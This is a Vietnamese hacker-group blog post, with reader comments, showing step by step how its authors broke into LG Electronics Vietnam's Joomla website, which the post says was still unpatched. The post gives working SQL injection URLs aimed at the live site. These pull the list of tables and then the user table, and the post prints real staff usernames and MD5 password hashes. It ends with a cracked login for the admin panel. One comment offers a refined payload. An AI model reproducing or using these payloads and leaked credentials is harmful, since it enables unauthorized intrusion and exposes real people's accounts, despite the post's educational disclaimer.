Trang chủ > Hacker - Xâm Nhập > LG Electronic Việt Nam bị xâm nhập thế nào

LG Electronic Việt Nam bị xâm nhập thế nào

Mấy hôm nay 1 số anh em Viet Matrix Revolutions cũng bạn nên không có online nhiều .

Nhưng hôm qua AlexBTP bị thua đá bóng nên cay cú , cộng thêm mấy diễn đàn “hacker” hay nói này nọ, kiểu này kiểu kia nên AlexBTP làm demo thử

P/s: Hiện lúc này web vẫn chưa fix lỗi , và mục đích bài này là để mọi người đặt biệt là các web master tham khảo , không có mục đích phá hoại này nọ . . . Chúng tôi không chịu trách nhiệm khi 1 số người dùng thông tin bài viết này đi phá người khác . Việc copy bài viết này đi nơi khác phải ghi rõ nguồn Viet Matrix Revolutions .Cảm ơn

Ta bắt đầu :

[Các bạn có thẻ copy link bên dưới chạy trên trình duyệt của mình nhưng chú ý khoảng cách vì chúng tôi cho xuống dòng trong bài này để viết đây đủ ]

Bước 1: chạy đường link sau

http://vn.lge.com/index.php?option=products&task=productsdetails&id=null%20union%20select%201,2,3,4,5,6,7,8,9,10

,11,12,13,14%20from%20information_schema.tables&Itemid=366

Kết quả

Xâm nhập LG Việt Nam - Viet Matrix Revolutions

Xâm nhập LG Việt Nam - Viet Matrix Revolutions

Chú ý số 3 : thường các lệnh khai thác sau này sẽ thực hiện tại vị trí này xem version

http://vn.lge.com/index.php?option=products&task=productsdetails&id=null%20union%20select%201,2,version(),4,5,6,7,8,9,10,11

,12,13,14%20from%20information_schema.tables&Itemid=366

Phần này quan trọng vì nếu version 5 trở lên ta có thể get tables và data còn version trở về trước thì thông thường phải đoán mà thôi

Tiếp tục ta lấy các column của tables jos_users

Lưu ý khi lấy column thì tables jos_user phải chuyển qua mã hex

[Sẽ có người hỏi tại sao có được tables này , câu trả lời đơn giản là get tables ra mà thôi , có thể tìm thêm tài liệu về sql xem thêm , còn không thì web này dùng code joomla load code về install xem table thử xem]

http://vn.lge.com/index.php?option=products&task=productsdetails&id=null%20union%20select%201,2,group_concat(column_name),4,5,6,7,8,9,

10,11,12,13,14%20from%20

information_schema.columns%20where%20table_name%20in%20(0x6a6f735f7573657273)–

Kết quả có các column sau :
id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params

Ta quan tâm đến usernamepassword và sẽ lấy thông tin 2 colum này
đầu tiên ta lấy column username
admin,hienpt,lge_service,lge.hung,huyenht,lge.trang,huyenntb,hnservice,hnsale

LG Viet Nam - Viet Matrix Revolutions

LG Viet Nam - Viet Matrix Revolutions

Trên là các usergiờ ta tiến hành lấy password
http://vn.lge.com/index.php?option=products&task=productsdetails&id=null%20union%20select%201,2,group_concat

(username,password),4,5,6,7,8,9,10,11,12,13,14%20from%20jos_users
kết quả là
admin5260d1daa8fae489c4001b414f811a13,

hienptb620d99f8c9f1160ca02b964cae803cd,

lge_servicedb61bd98ef51fc017b49cee772313586,lge.hung1752f720cb369e530a2b2fb1523216ca,

huyenht86836c28756808e4996fc39a3499ad87,

lge.trangff8ee7655c54c0f5cc1e1928c80ee2c9,huyenntbfcea920f7412b5da7be0cf42b8c93759,hnserviceda907a1b8f74e6922d93b025eecfb852,hnsaleda907a1b
đến đây có nhiều bạn không để ý sẽ hỏi làm sao phân biệt được user và pass
Về phần này thì user và pass mã hóa dạng MD5 .User và pass của  1 cặp người dùng này được ngăng cách bởi người kia là 1 dấu phẩy ,
Có user và pass rồi nhưng pass mã dạng md5 nên ta phải dịch mã này
Nhưng việc dịch mã MD5 hiện tại thì không thể . nó chỉ lấy kết quả đã có rồi so sánh đúng thì xuất ra thôi
Viet Matrix Revolutions lấy pass của anh bạn lge.hung là 1752f720cb369e530a2b2fb1523216ca tìm  pass và user là 1 (u=p)
giờ có đầy đủ rồi thì login vào thôi
LG dùng joomla nên link login sẽ là
http://vn.lge.com/administrator/

LG Viet Nam - Viet Matrix Revolutions

LG Viet Nam - Viet Matrix Revolutions

Ok kết thúc tại đây  – Mọi câu hỏi được yêu cầu và sẽ giải thích tại đây
Viet Matrix Revolutions – AlexBTP , Anderson_neo

  1. Le Hieu
    Tháng Năm 17, 2009 lúc 7:41 sáng

    http://vn.lge.com/index.php?option=products&task=productsdetails&id=null%20union%20select%201,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20jos_users

    Them cái Ox3a vào để lấy user và pass cho nhanh 0x3a là giấu :

  2. vietmatrix
    Tháng Năm 17, 2009 lúc 8:03 sáng

    Cũng vậy thôi

  3. Le Hieu
    Tháng Năm 17, 2009 lúc 8:47 sáng

    Thế cho nó giễ nhìn thôi mà. Cho hỏi làm sao để phân biệt lỗi SQL joomla này cho em cái link đầu tiên lỗi đấy ạ Thanks anh admin trước

  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: